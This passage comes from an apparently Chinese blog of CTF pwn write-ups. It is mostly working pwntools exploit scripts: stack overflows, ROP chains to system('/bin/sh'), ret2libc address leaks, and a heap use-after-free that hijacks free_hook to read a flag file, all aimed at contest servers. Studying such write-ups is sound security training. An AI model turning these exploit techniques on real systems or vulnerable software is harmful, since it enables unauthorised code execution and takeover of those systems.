gdb.attach(io)<br>io.sendline(pd)<br>io.interactive()<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">what&#8217;s your name<\/h2>\n\n\n\n<p>\u8986\u76d6<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">from pwn import *<br>io = remote(\"1.95.36.136\",2105)<br># io = process(\".\/pwn\")<br>\u200b<br>pd = b'aaaatznb'<br>io.send(pd)<br>io.interactive()<\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">getshell<\/h2>\n\n\n\n<h2 class=\"wp-block-heading\">0xgame2025<\/h2>\n\n\n\n<p>\u597d\u591a\uff0c\u4e4b\u540e\u518d\u6765\u7ec6\u5206<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code># from pwn import *\n# io = remote(\"nc1.ctfplus.cn\",42686)\n# ret = 0x000000000040101a\n# backdoor = 0x4011F7\n# payload = b'a'*(48+8) + p64(ret) + p64(backdoor)\n# io.sendline(payload)\n# io.interactive()\n\n# from pwn import *\n#\n# context.log_level = 'debug'\n# io = remote(\"nc1.ctfplus.cn\", 33062)\n#\n# try:\n#     # \u5904\u7406\u521d\u59cb\u63d0\u793a\u4fe1\u606f\n#     io.recvuntil(b\"Kore wa shiren da!\\n\")\n#\n#     while True:\n#         # \u5c1d\u8bd5\u63a5\u6536\u9898\u76ee\u884c\n#         try:\n#             question = io.recvuntil(b\"=\", drop=True, timeout=1).decode().strip()\n#         except:\n#             # \u65e0\u6cd5\u63a5\u6536\u65b0\u9898\u76ee\u65f6\uff0c\u8fdb\u5165\u4ea4\u4e92\u6a21\u5f0f\n#             print(\"No more questions, entering interactive mode...\")\n#             break\n#\n#         # \u5c06\u4e58\u6cd5\u7b26\u53f7x\u66ff\u6362\u4e3a*\n#         question = question.replace(\"x\", \"*\")\n#         # \u8ba1\u7b97\u7ed3\u679c\n#         ans = int(eval(question))\n#         # \u53d1\u9001\u7b54\u6848\uff0c\u4f7f\u7528bytes\u7c7b\u578b\u907f\u514d\u8b66\u544a\n#         io.sendlineafter(b\"?\\n\", str(ans).encode())\n#         # \u63a5\u6536\"Good work!\"\u7684\u53cd\u9988\n#         io.recvuntil(b\"Good work!\\n\")\n#\n# except Exception as e:\n#     print(f\"Error occurred: {e}\")\n#\n# # \u65e0\u8bba\u6b63\u5e38\u7ed3\u675f\u8fd8\u662f\u5f02\u5e38\uff0c\u90fd\u8fdb\u5165\u4ea4\u4e92\u6a21\u5f0f\n# io.interactive()\n\n# from pwn import *\n# context.log_level = 'debug'\n# io = remote('nc1.ctfplus.cn', 27397)\n#\n# # 1. \u786e\u8ba4\u6240\u6709\u5173\u952e\u5730\u5740\uff08\u4ece\u4f60\u7684ROPgadget\u548c\u53cd\u7f16\u8bd1\u7ed3\u679c\u9a8c\u8bc1\uff0c\u5747\u6b63\u786e\uff09\n# sh = 0x000000000040201e          # \"\/bin\/sh\"\u5b57\u7b26\u4e32\u5730\u5740\uff08\u5fc5\u987b\u5b58\u5728\uff0c\u53ef\u901a\u8fc7objdump -s\u786e\u8ba4\uff09\n# call_system = 0x0000000000401195  # help\u51fd\u6570\u4e2d\"call _system\"\u7684\u5730\u5740\uff08\u76f4\u63a5\u590d\u7528\u73b0\u6210\u7684system\u8c03\u7528\uff09\n# pop_rdi = 0x000000000040117e      # \u6b63\u786e\u7684\"pop rdi; ret\" gadget\uff08ROPgadget\u660e\u786e\u663e\u793a\u5b58\u5728\uff09\n#\n# # 2. \u6784\u9020ROP\u94fe\uff08\u504f\u79fb\u6b63\u786e\uff1a32\u5b57\u8282buf + 8\u5b57\u8282rbp = 40\u5b57\u8282\u586b\u5145\uff09\n# payload = (\n#     b'a' * 40                  # \u586b\u5145\u7f13\u51b2\u533a\u5230rbp\uff0c\u518d\u8986\u76d6rbp\n#     + p64(pop_rdi)             # \u6267\u884c\u540e\uff0c\u6808\u9876\u7684\u503c\u4f1a\u653e\u5165rdi\uff08x86_64\u7b2c\u4e00\u4e2a\u53c2\u6570\u5bc4\u5b58\u5668\uff09\n#     + p64(sh)                  # \u628a\"\/bin\/sh\"\u5730\u5740\u538b\u6808\uff0c\u4f9bpop_rdi\u53d6\u51fa\u653e\u5165rdi\n#     + p64(call_system)         # \u8c03\u7528system\uff0c\u6b64\u65f6rdi\u5df2\u6307\u5411\"\/bin\/sh\"\uff0c\u76f4\u63a5\u83b7\u53d6shell\n# )\n#\n# # 3. \u6309\u5b9e\u9645\u8f93\u51fa\u987a\u5e8f\u63a5\u6536\uff08\u5173\u952e\uff01\u5148\u6536help\u7684\u8f93\u51fa\uff0c\u518d\u6536main\u7684puts\u8f93\u51fa\uff09\n# io.recvuntil(b\"Maybe you need this: sh\\n\")  # \u7b2c\u4e00\u6b65\u5b9e\u9645\u6536\u5230\u7684\u662fhelp\u7684echo\u8f93\u51fa\n# io.sendline(payload)\n#\n#\n#\n#\n# # 5. \u8fdb\u5165\u4ea4\u4e92\u6a21\u5f0f\u83b7\u53d6shell\n# io.interactive()\n\nfrom pwn import *\n\n# \u8fde\u63a5\u8fdc\u7a0b\u76ee\u6807\uff08\u672c\u5730\u6d4b\u8bd5\u65f6\u66ff\u6362\u4e3a\uff1ap = process(\".\/pwn2\")\uff09\np = remote(\"nc1.ctfplus.cn\", 28889)\n\n# \u5173\u952e\u56fa\u5b9a\u5730\u5740\uff08\u5df2\u901a\u8fc7\u8c03\u8bd5\u786e\u8ba4\uff0c\u65e0\u9700\u4fee\u6539\uff09\npadding = b'A' * 56  # 48\u5b57\u8282buf + 8\u5b57\u8282rbp\uff0c\u8986\u76d6\u81f3\u8fd4\u56de\u5730\u5740\npop_rdi = p64(0x000000000040119e)  # pop rdi; ret\uff08\u4f20\u9012system\u53c2\u6570\u7684\u6838\u5fc3gadget\uff09\nsystem_addr = p64(0x000000000040122B)  # main\u4e2dcall system@plt\u7684\u5730\u5740\ncmd_addr = p64(0x0000000000401202)  # \u56fa\u5b9a\u5b58\u50a8\"$0\"\u7684\u5730\u5740\uff08\u7b49\u4ef7\u4e8e\/bin\/sh\uff09\n\n# \u6784\u9020ROP\u94fe\uff1a\u8986\u76d6\u8fd4\u56de\u5730\u5740 \u2192 \u4f20\u53c2 \u2192 \u8c03\u7528system\npayload = padding + pop_rdi + cmd_addr + system_addr\n\n# \u53d1\u9001payload\uff08\u7b49\u5f85\u7a0b\u5e8f\u8f93\u51fa\"Start your attack\"\u540e\u53d1\u9001\uff09\np.sendlineafter(\"Start your attack\", payload)\n\n# \u4ea4\u4e92\u83b7\u53d6shell\uff08\u6267\u884cls\u3001cat flag\u7b49\u547d\u4ee4\uff09\np.interactive()<\/code><\/pre>\n\n\n\n<h1 class=\"wp-block-heading\">lilpwn\uff08\u6211\u600e\u4e48\u81ea\u5df1\u90fd\u6ca1\u8bb0\u5fc6\u4e86\u2026\u2026<\/h1>\n\n\n\n<h2 class=\"wp-block-heading\">Heap Pivoting<\/h2>\n\n\n\n<p>\u8fd9\u4e2a\u5806\u9898\u76ee\u7684\u6838\u5fc3\u662f\u5229\u7528\u5806\u6f0f\u6d1e\u5b9e\u73b0\u4efb\u610f\u5730\u5740\u8bfb\u5199\uff0c\u6700\u7ec8\u901a\u8fc7ROP\u94fe\u8bfb\u53d6flag\u3002\u9898\u76ee\u662f\u9759\u6001\u7f16\u8bd1\u768464\u4f4d\u7a0b\u5e8f\uff0c\u5f00\u542f\u4e86NX\u4f46\u672a\u5f00\u542fPIE\uff0c\u8ba9\u6211\u4eec\u80fd\u591f\u5229\u7528\u56fa\u5b9a\u5730\u5740\u8fdb\u884c\u653b\u51fb\u3002<\/p>\n\n\n\n<p>\u7a0b\u5e8f\u5b58\u5728\u4e24\u4e2a\u5173\u952e\u6f0f\u6d1e\uff1a<\/p>\n\n\n\n<ol class=\"wp-block-list\">\n<li><strong>UAF\u6f0f\u6d1e<\/strong>\uff1a\u91ca\u653e\u5806\u5757\u540e\u6307\u9488\u672a\u6e05\u96f6\uff0c\u53ef\u7ee7\u7eed\u7f16\u8f91<\/li>\n\n\n\n<li><strong>\u5806\u6ea2\u51fa<\/strong>\uff1a\u7f16\u8f91\u529f\u80fd\u672a\u68c0\u67e5\u957f\u5ea6\uff0c\u53ef\u8986\u76d6\u76f8\u90bb\u5806\u5757\u5143\u6570\u636e<\/li>\n<\/ol>\n\n\n\n<p>\u9996\u5148\u521b\u5efa\u4e24\u4e2a\u5806\u5757\uff0c\u5176\u4e2dchunk1\u5b58\u653e&#8221;flag&#8221;\u5b57\u7b26\u4e32\u5907\u7528\u3002\u91ca\u653echunk0\u5236\u9020\u60ac\u7a7a\u6307\u9488\uff0c\u7136\u540e\u7f16\u8f91\u5b83\u4fee\u6539fd\u6307\u9488\u6307\u5411\u5806\u5757\u5217\u8868(chunk_list)\u4e0a\u65b90x10\u5b57\u8282\u5904\u3002\u8fd9\u6837\u518d\u6b21\u5206\u914dchunk2\u65f6\uff0c\u5c31\u80fd\u63a7\u5236\u5806\u5757\u5217\u8868\u672c\u8eab\u3002<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>add(0)<br>add(1, \"flag\") &nbsp;# \u5b58\u50a8\"flag\"\u5b57\u7b26\u4e32<br>free(0) &nbsp;# \u5236\u9020UAF<br>\u200b<br># \u4fee\u6539fd\u6307\u5411\u5806\u5757\u5217\u8868<br>chunk_list = 0x6CCD60<br>edit(0, p64(0) + p64(chunk_list - 0x10))<br>add(2) &nbsp;# \u6b64\u65f6chunk2\u63a7\u5236\u5806\u5757\u5217\u8868<\/code><\/pre>\n\n\n\n<p>\u901a\u8fc7\u4fee\u6539\u5806\u5757\u5217\u8868\uff0c\u5c06free_hook\u7684\u5730\u5740\u653e\u5165\u5806\u5757\u5217\u8868\u4e2d\u3002\u8fde\u7eed\u5206\u914d\u591a\u4e2achunk2\uff0c\u5728\u6bcf\u6b21\u5206\u914d\u65f6\u5728\u5806\u5757\u5185\u5bb9\u4e2d\u6784\u9020fake chunk\uff0c\u4f7f\u5176fd\u6307\u5411free_hook\u5730\u5740\u3002\u8fd9\u6837\u5c31\u80fd\u901a\u8fc7\u7f16\u8f91chunk0\u6765\u4fee\u6539free_hook\u7684\u503c\u3002<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\"># \u8bbe\u7f6e\u5806\u5757\u5217\u8868\u6307\u5411\u5173\u952e\u5168\u5c40\u53d8\u91cf<br>edit(0, p64(0x6cc968) + p64(0) + p64(0x6ca858) * 2)<br>\u200b<br># \u591a\u6b21\u5206\u914d\u6784\u9020fake chunk\u6307\u5411free_hook<br>free_hook = 0x6CC5E8<br>for i in range(4):<br> &nbsp; &nbsp;add(2, b'a' * 0xb8 + p64(free_hook) + p64(0x6cc640))<\/pre>\n\n\n\n<p>\u5c06free_hook\u8986\u76d6\u4e3a_dl_debug_printf\u51fd\u6570\u5730\u5740\u3002\u8fd9\u4e2a\u51fd\u6570\u53ef\u4ee5\u63a7\u5236rdi\u6253\u5370\u4efb\u610f\u5730\u5740\u5185\u5bb9\u3002\u91ca\u653echunk1\u89e6\u53d1\u8be5\u51fd\u6570\u8c03\u7528\uff0c\u6cc4\u9732\u6808\u5730\u5740\u3002<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code># \u8986\u76d6free_hook\u4e3a_dl_debug_printf<br>_dl_debug_printf = 0x474310<br>edit(0, p64(_dl_debug_printf))<br>free(1) &nbsp;# \u89e6\u53d1\u51fd\u6570\u8c03\u7528\uff0c\u6cc4\u9732\u6808\u5730\u5740<br>\u200b<br># \u8ba1\u7b97\u8fd4\u56de\u5730\u5740\u4f4d\u7f6e<br>stack = u64(ru(b'\\x7f')&#91;-6:].ljust(8, b'\\x00'))<br>return_addr = stack - 0x180<\/code><\/pre>\n\n\n\n<p>\u901a\u8fc7\u5806\u6ea2\u51fa\u5c06\u4e3b\u51fd\u6570\u8fd4\u56de\u5730\u5740\u8986\u76d6\u4e3aROP\u94fe\u5730\u5740\u3002\u6784\u9020\u7684ROP\u94fe\u4f9d\u6b21\u6267\u884c\uff1a<\/p>\n\n\n\n<ol class=\"wp-block-list\">\n<li>\u6253\u5f00&#8221;flag&#8221;\u6587\u4ef6\uff08\u7cfb\u7edf\u8c03\u7528\u53f72\uff09<\/li>\n\n\n\n<li>\u8bfb\u53d6\u6587\u4ef6\u5185\u5bb9\u5230\u6808\u7f13\u51b2\u533a<\/li>\n\n\n\n<li>\u5c06\u5185\u5bb9\u8f93\u51fa\u5230\u6807\u51c6\u8f93\u51fa<\/li>\n<\/ol>\n\n\n\n<pre class=\"wp-block-code\"><code># \u8986\u76d6\u8fd4\u56de\u5730\u5740<br>edit(2, b'a' * 0xb8 + p64(return_addr))<br>\u200b<br># \u6784\u9020ORW ROP\u94fe<br>pop_rdi = 0x0000000000401a16<br>pop_rsi = 0x0000000000401b37<br>pop_rdx = 0x0000000000443136<br>pop_rax = 0x000000000041fc84<br>syscall_ret = 0x4678E5<br>\u200b<br>pd = p64(pop_rdi) + p64(return_addr + 0xc8) &nbsp;# \"flag\"\u5b57\u7b26\u4e32\u5730\u5740<br>pd += p64(pop_rsi) + p64(0) &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; # \u53ea\u8bfb\u6a21\u5f0f<br>pd += p64(pop_rax) + p64(2) &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; # SYS_open<br>pd += p64(syscall_ret)<br>\u200b<br># \u8bfb\u53d6\u6587\u4ef6\u5185\u5bb9<br>pd += p64(pop_rdi) + p64(3) &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; # \u6587\u4ef6\u63cf\u8ff0\u7b26<br>pd += p64(pop_rsi) + p64(return_addr + 0x500) # \u7f13\u51b2\u533a<br>pd += p64(pop_rdx) + p64(0x30) &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;# \u957f\u5ea6<br>pd += p64(pop_rax) + p64(0) &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; # SYS_read<br>pd += p64(syscall_ret)<br>\u200b<br># \u8f93\u51fa\u5230\u6807\u51c6\u8f93\u51fa<br>pd += p64(pop_rdi) + p64(1) &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; # stdout<br>pd += p64(pop_rsi) + p64(return_addr + 0x500)<br>pd += p64(pop_rdx) + p64(0x30)<br>pd += p64(pop_rax) + p64(1) &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; # SYS_write<br>pd += p64(syscall_ret)<br>pd += b'flag\\x00\\x00\\x00\\x00' &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; # \"flag\"\u5b57\u7b26\u4e32<br>\u200b<br>edit(0, pd) &nbsp;# \u5199\u5165ROP\u94fe<\/code><\/pre>\n\n\n\n<p>\u6700\u7ec8exp\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>from pwn import *<br>context(log_level='debug')<br>elf = ELF('.\/pwn')<br>context.binary = elf<br>libc = elf.libc<br>\u200b<br>DEBUG_ARGV = \"\"\"<br>b *0x400C66<br>b *0x41E985<br>b *0x400C66<br>set glibc 2.23<br>\"\"\"<br>\u200b<br>\u200b<br>\u200b<br>\u200b<br>def lg(s):<br> &nbsp; &nbsp;return info(f'\\033&#91;1;33m{f\"{s}--&gt;0x{eval(s):02x}\"}\\033&#91;0m')<br>\u200b<br>\u200b<br>r = lambda a: io.recv(a)<br>ru = lambda a: io.recvuntil(a)<br>s = lambda a: io.send(a)<br>sa = lambda a, b: io.sendafter(a, b)<br>sl = lambda a: io.sendline(a)<br>sla = lambda a, b: io.sendlineafter(a, b)<br>\u200b<br>io = remote(\"challenge.xinshi.fun\",48639 )<br>\u200b<br>\u200b<br>def choice(idx):<br> &nbsp; &nbsp;sla(b'choice:', str(idx))<br>\u200b<br>\u200b<br>def add(idx, content=b'aaaa'):<br> &nbsp; &nbsp;choice(1)<br> &nbsp; &nbsp;sla(b'idx:', str(idx))<br> &nbsp; &nbsp;sa(b\"say\", content)<br>\u200b<br>\u200b<br>def free(idx):<br> &nbsp; &nbsp;choice(2)<br> &nbsp; &nbsp;sla(b'idx:', str(idx))<br>\u200b<br>\u200b<br>def edit(idx, content):<br> &nbsp; &nbsp;choice(3)<br> &nbsp; &nbsp;sla(b'idx:', str(idx))<br> &nbsp; &nbsp;sa(b'context: ', content)<br>\u200b<br>\u200b<br>def exit_():<br> &nbsp; &nbsp;choice(4)<br>\u200b<br>\u200b<br>add(0)<br>add(1, \"flag\")<br>\u200b<br>free(0)<br>\u200b<br>chunk_list = 0x6CCD60<br>edit(0, p64(0) + p64(chunk_list - 0x10))<br>add(2)<br>\u200b<br>free_hook = 0x6CC5E8<br>edit(0, p64(0x6cc968) + p64(0) + p64(0x6ca858) * 2)<br>\u200b<br>rdi = 0x6ccd68<br>for i in range(4):<br> &nbsp; &nbsp;add(2, b'a' * 0xb8 + p64(free_hook) + p64(0x6cc640))<br>\u200b<br>fopen64 = 0x46AC50<br>fputs = 0x463340<br>fxprintf = 0x40FE20<br>vfxprintf = 0x45F940<br>_dl_debug_printf = 0x474310<br>mmap = 0x440710<br>edit(0, p64(_dl_debug_printf))<br>\u200b<br>free(1)<br>\u200b<br>stack = u64(ru(b'\\x7f')&#91;-6:].ljust(8, b'\\x00'))<br>lg(\"stack\")<br>return_addr = stack - 0x180<br>lg(\"return_addr\")<br>\u200b<br>edit(2, b'a' * 0xb8 + p64(return_addr))<br>\u200b<br>pop_rdi = 0x0000000000401a16<br>pop_rsi = 0x0000000000401b37<br>pop_rdx = 0x0000000000443136<br>pop_rax = 0x000000000041fc84<br>pop_rbp = 0x00000000004004d1<br>ret = 0x00000000004002e1<br>syscall_ret = 0x4678E5<br>\u200b<br>pd = p64(pop_rdi) + p64(return_addr + 0xc8)<br>pd += p64(pop_rsi) + p64(0)<br>pd += p64(pop_rax) + p64(2)<br>pd += p64(syscall_ret)<br>\u200b<br>pd += p64(pop_rdi) + p64(3)<br>pd += p64(pop_rsi) + p64(return_addr + 0x500)<br>pd += p64(pop_rdx) + p64(0x30)<br>pd += p64(pop_rax) + p64(0)<br>pd += p64(syscall_ret)<br>\u200b<br>pd += p64(pop_rdi) + p64(1)<br>pd += p64(pop_rsi) + p64(return_addr + 0x500)<br>pd += p64(pop_rdx) + p64(0x30)<br>pd += p64(pop_rax) + p64(1)<br>pd += p64(syscall_ret)<br>pd += b'flag\\x00\\x00\\x00\\x00'<br>\u200b<br>edit(0, pd)<br>\u200b<br>io.interactive()<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">\u7b7e\u5230<\/h2>\n\n\n\n<p>64\u4f4dret2libc\u677f\u5b50\u9898<\/p>\n\n\n\n<p>ROPgadget\u627epop rdi \uff0cret<\/p>\n\n\n\n<p>\u7136\u540e\u504f\u79fb0x70<\/p>\n\n\n\n<p>\u9898\u76ee\u5df2\u7ecf\u7ed9\u4e86libc\u6587\u4ef6<\/p>\n\n\n\n<p>exp\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>from pwn import *<br>\u200b<br>\u200b<br>io = remote('challenge.xinshi.fun',49363)<br># io=process(\".\/pwn\")<br>elf = ELF('.\/pwn')<br>libc= ELF('.\/libc.so.6')<br>\u200b<br>ret_add = 0x000000000040101a<br>pop_rdi = 0x0000000000401176<br>main_add = 0x401178<br>puts_got = elf.got&#91;'puts']<br>puts_plt = elf.plt&#91;'puts']<br>\u200b<br>print(\"Puts_got: \",hex(puts_got))<br>print(\"Puts_plt: \",hex(puts_plt))<br>\u200b<br>offset= 0x70<br>\u200b<br>payload1 = b'a' * (offset+8) + p64(pop_rdi) + p64(puts_got) + p64(puts_plt) + p64(main_add)<br>io.sendlineafter(b'name?', payload1)<br>puts_addr = u64(io.recvuntil(b'\\x7f')&#91;-6:].ljust(8,b'\\x00'))<br>print(\"Puts_addr: \",hex(puts_addr))<br>\u200b<br>\u200b<br>\u200b<br>libc_base = puts_addr - libc.symbols&#91;'puts']<br>system_add = libc_base + libc.symbols&#91;'system']<br>bin_sh_add = libc_base + next(libc.search(b'\/bin\/sh'))<br>\u200b<br>payload2 = b'a' * (offset+8) + p64(ret_add) + p64(pop_rdi) + p64(bin_sh_add) + p64(system_add)<br>\u200b<br>io.sendlineafter(b'name?', payload2)<br>\u200b<br>io.interactive()<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">Ret2libc&#8217;s Revenge<\/h2>\n\n\n\n<p>64\u4f4d<\/p>\n\n\n\n<p>ROPgadget\u627e\u4e0d\u5230pop rdi<\/p>\n\n\n\n<p>\u53ea\u80fd\u53e6\u627e\u4ee3\u66ff<\/p>\n\n\n\n<p>stdout\u8bbe\u7f6e\u4e3a\u65e0\u7f13\u51b2\uff0c\u6ca1\u529e\u6cd5\u76f4\u63a5\u6cc4\u9732\u5730\u5740\uff0c\u53ea\u80fd\u901a\u8fc7\u6ea2\u51fa\u591a\u6b21\u5faa\u73af\uff0c\u628a\u7f13\u51b2\u533a\u586b\u6ee1\uff0c\u518d\u586b\u4e00\u4e2alea rdi\uff0cs\u7684\u5730\u5740\uff0c\u7136\u540e\u5c31\u662fret2libc<\/p>\n\n\n\n<p>\u5faa\u73af\u6b21\u6570\u901a\u8fc7\u624b\u6413<\/p>\n\n\n\n<p>puts(&#8220;Ret2libc&#8217;s Revenge&#8221;);\u4f1a\u5199\u8fdb18\u4e2a\u5b57\u7b26\u52a0\u4e00\u4e2a\u6362\u884c\u7b26\uff0c\u5c31\u662f19\u4e2a<\/p>\n\n\n\n<p>\u7a0b\u5e8f\u672c\u8eab\u4f1a\u6267\u884c\u4e00\u6b21puts<\/p>\n\n\n\n<p>\uff08214+1\uff09*19 = 4085<\/p>\n\n\n\n<p>\u800c\u7f13\u51b2\u533a\u4e3a0x1000 = 4096<\/p>\n\n\n\n<p>\u6240\u4ee5\u5faa\u73af\u6b21\u6570\u662f214<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>from pwn import *<br>\u200b<br>elf = ELF('.\/src\/attachment')<br>context.binary = elf<br>libc = ELF(\".\/src\/libc6_2.35-0ubuntu3.9_amd64.so\")<br>\u200b<br>io=remote(\"39.106.48.123\",35843)<br>\u200b<br>and_rsi_0 = 0x4010E4<br>pop_rbp = 0x000000000040117d<br>gadget = 0x4010EB # add rsi, &#91;rbp+20h];ret<br>mov_rdi_rsi = 0x401180<br>\u200b<br>payload = b'a'*(0x220-4)+p32(0x220+8-3)<br>payload += p64(0x40128D)<br>\u200b<br>\u200b<br>for i in range(214):<br> &nbsp; &nbsp;io.sendline(payload)<br>\u200b<br>payload = b'a'*(0x220-4)+p32(0x220+8 - 3)<br>\u200b<br>payload += p64(and_rsi_0)<br>payload += p64(pop_rbp) + p64(0x400600-0x20)<br>payload += p64(gadget)<br>payload += p64(mov_rdi_rsi)<br>payload += p64(elf.plt&#91;'puts'])<br>payload += p64(0x40128D)<br>io.sendline(payload)<br>\u200b<br>libc_base = u64(io.recvuntil(b'\\x7f')&#91;-6:].ljust(8,b'\\x00'))-libc.symbols&#91;b\"puts\"]<br>\u200b<br>\u200b<br>libc_system = libc_base + libc.symbols&#91;b'system']<br>ret = 0x4011FE<br>bin_sh = libc_base + next(libc.search(b\"\/bin\/sh\"))<br>pop_rdi = libc_base +next(libc.search(asm(\"pop rdi; ret\")))<br>\u200b<br>payload = b'a'*(0x220-4)+p32(0x220+8 - 3)<br>payload += p64(ret)<br>payload += p64(pop_rdi)<br>payload += p64(bin_sh)<br>payload += p64(libc_system)<br>io.sendlineafter(\"Ret\",payload)<br>\u200b<br>\u200b<br>io.interactive()<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">2025COCTF\u65b0\u751f\u8d5bWP<\/h2>\n\n\n\n<pre class=\"wp-block-preformatted\">typora-root-url: images\n<\/pre>\n\n\n\n<h1 class=\"wp-block-heading\">feichai\u7cfb\u5217\u9898\u76ee\uff1a<\/h1>\n\n\n\n<h3 class=\"wp-block-heading\">Pwn\u5165\u95e8\u6307\u5317<\/h3>\n\n\n\n<p>emmmm,\u76f4\u63a5\u770b\u6307\u5317\u5c31\u597d\u4e86<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>from pwn import * &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;# \u5bfc\u5165 pwntools\u3002<br>context(arch='amd64', os='linux', log_level='debug') # \u4e00\u4e9b\u57fa\u672c\u7684\u914d\u7f6e\u3002<br>\u200b<br># elf = ELF('..\/ctf_file\/test') &nbsp; &nbsp; # \u52a0\u8f7d elf \u6587\u4ef6\u3002<br># io = process(elf.path) &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  # \u8fd0\u884c elf \u6587\u4ef6\u3002<br>io = remote(\"\",) &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;# \u4e0e\u5728\u7ebf\u73af\u5883\u4ea4\u4e92\u3002<br>\u200b<br>io.recvuntil(\"&gt; \") &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;# \u5faa\u73af\u7b49\u5f85\uff0c\u76f4\u5230\u63a5\u6536\u5230\u63d0\u793a\u7b26\u3002<br>io.sendline(\"No pwn\/re, no life!\") &nbsp;# \u53d1\u9001\u5b57\u7b26\u4e32\u3002<br>\u200b<br>io.interactive() &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;# \u8fdb\u5165\u4ea4\u4e92\u6a21\u5f0f\u3002<\/code><\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">\u7ec8\u6781\u9ed1\u5ba2<\/h3>\n\n\n\n<p>\u8003\u70b9\u53ea\u6709\u4e00\u4e2a\u547d\u4ee4<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>ls -a<\/code><\/pre>\n\n\n\n<p>\u53ef\u4ee5\u770b\u5230flag\u524d\u52a0\u4e86\u4e00\u4e2a\u70b9\uff0c\u76f4\u63a5ls\u662f\u770b\u4e0d\u5230\u7684<\/p>\n\n\n\n<p>\u6240\u4ee5<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>cat .flag<\/code><\/pre>\n\n\n\n<p>\u5c31\u53ef\u4ee5\u4e86<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">\u77f3\u5934\u270a\u526a\u5200\u270c\ufe0f\u5e03\u270b<\/h3>\n\n\n\n<p>\u53ef\u4ee5\u770b\u5230\u7a0b\u5e8f\u52a0\u4e86\u4e00\u4e2a\u968f\u673a\u6570\u79cd\u5b50\uff0c\u4f46\u8fd9\u5e76\u4e0d\u662f\u771f\u6b63\u7684\u968f\u673a\uff0ctime(0)\u8868\u793a\u5f53\u524d\u65f6\u95f4\uff0c\u8fd4\u56de\u65f6\u95f4\u6233\uff0csrand\u5c06\u5176\u4f5c\u4e3a\u79cd\u5b50\uff0c\u4ee5\u6b64\u4f7f\u7528rand()\u51fd\u6570\u6765\u751f\u6210\u968f\u673a\u6570<\/p>\n\n\n\n<p>\u6240\u4ee5\uff0c\u6211\u4eec\u5b8c\u5168\u53ef\u4ee5\u4f7f\u7528python\u7684ctypes\u5e93\u6765\u6a21\u62df\u8fd9\u4e00\u884c\u4e3a\uff0c\u4f7f\u5f97\u6211\u4eec\u80fd\u63a8\u6d4b\u6240\u6709\u7684\u968f\u673a\u6570<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image-48-1024x679.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"679\" data-original=\"https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image-48-1024x679.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-702\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p>\u7535\u8111\u731c\u62f3\u903b\u8f91<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image-49.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"477\" height=\"120\" 